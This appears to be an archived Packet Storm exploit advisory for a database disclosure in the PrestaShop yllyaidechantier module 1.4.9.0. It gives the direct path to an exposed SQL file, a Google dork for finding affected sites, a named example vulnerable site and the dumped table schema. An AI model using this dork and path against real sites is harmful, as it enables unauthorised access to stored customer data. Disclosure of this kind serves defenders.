exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure
Posted Dec 24, 2018
Authored by KingSkrupellos

PrestaShop yllyaidechantier module version 1.4.9.0 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | cb38aa19f54761181d1e7256da153d82ac622909a53939e2a2ead2c176bf68d6
Download | Favorite | View

PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure

Change Mirror Download
###########################################################################

# Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.9.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/yllyaidechantier/db/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

###########################################################################

# Exploit :

/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Example SQL Database Dump Information Exposure =>

-- phpMyAdmin SQL Dump
-- version 4.0.4
-- http://www.phpmyadmin.net
--
-- Client: localhost
-- 
GA(c)nA(c)rA(c) le: Lun 07 Avril 2014 A  16:27
-- Version du serveur: 5.5.20-log
-- Version de PHP: 5.3.10

SET
SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET
@OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET
@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET
@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101
SET NAMES utf8 */;

--
-- Base de donnA(c)es: `velux`
--
CREATE DATABASE IF NOT EXISTS `velux`
DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
USE `velux`;

-- --------------------
------------------------------------

--
-- Structure de la table `ps_y_aidechantier_demande`
--


DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
CREATE TABLE IF NOT EXISTS
`ps_y_aidechantier_demande` (
  `id_demande` int(11) NOT NULL AUTO_INCREMENT,
  `id_template
` int(11) NOT NULL,
  `id_customer` int(11) NOT NULL,
  `id_scenario` int(11) NOT NULL,
  `lastname`
varchar(500) NOT NULL,
  `firstname` varchar(500) NOT NULL,
  `phone` varchar(50) NOT NULL,

`email` varchar(500) NOT NULL,
  `fax` varchar(50) NOT NULL,
  `chantier_charpente` varchar(500)
NOT NULL,
  `chantier_couverture` varchar(500) NOT NULL,
  `chantier_fenetre` varchar(500) NOT NULL,

 `chantier_raccord` varchar(500) NOT NULL,
  `chantier_isolation` varchar(500) NOT NULL,

 `chantier_domotique` varchar(500) NOT NULL,
  `date_add` date NOT NULL,
  PRIMARY KEY
(`id_demande`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- ----------------
----------------------------------------

--
-- Structure de la table `ps_y_aidechantier_scenario`
--

DROP TABLE IF
EXISTS `ps_y_aidechantier_scenario`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario`
 (
  `id_scenario` int(11) NOT NULL AUTO_INCREMENT,
  `id_template` int(11) NOT NULL,

`title` varchar(500) NOT NULL,
  `price` double NOT NULL,
  `date_add` date NOT NULL,

PRIMARY KEY (`id_scenario`)
) ENGINE=InnoDB  DEFAULT CHARSET=latin1
AUTO_INCREMENT=3 ;

-- --------------------------------------------------------

--
-- Structure de la table
`ps_y_aidechantier_template`
--

DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
CREATE
TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
  `id_template` int(11)
NOT NULL AUTO_INCREMENT,
  `id_product` int(11) NOT NULL,
  `name` varchar(500) NOT NULL,

`date_add` date NOT NULL,
  PRIMARY KEY (`id_template`),
  UNIQUE KEY `id_product_2` (`id_product`),

 KEY `id_product` (`id_product`)
) ENGINE=InnoDB  DEFAULT CHARSET=latin1
AUTO_INCREMENT=8 ;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT
*/;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101
 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;


###########################################################################

# Example Vulnerable Site =>

[+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team

###########################################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close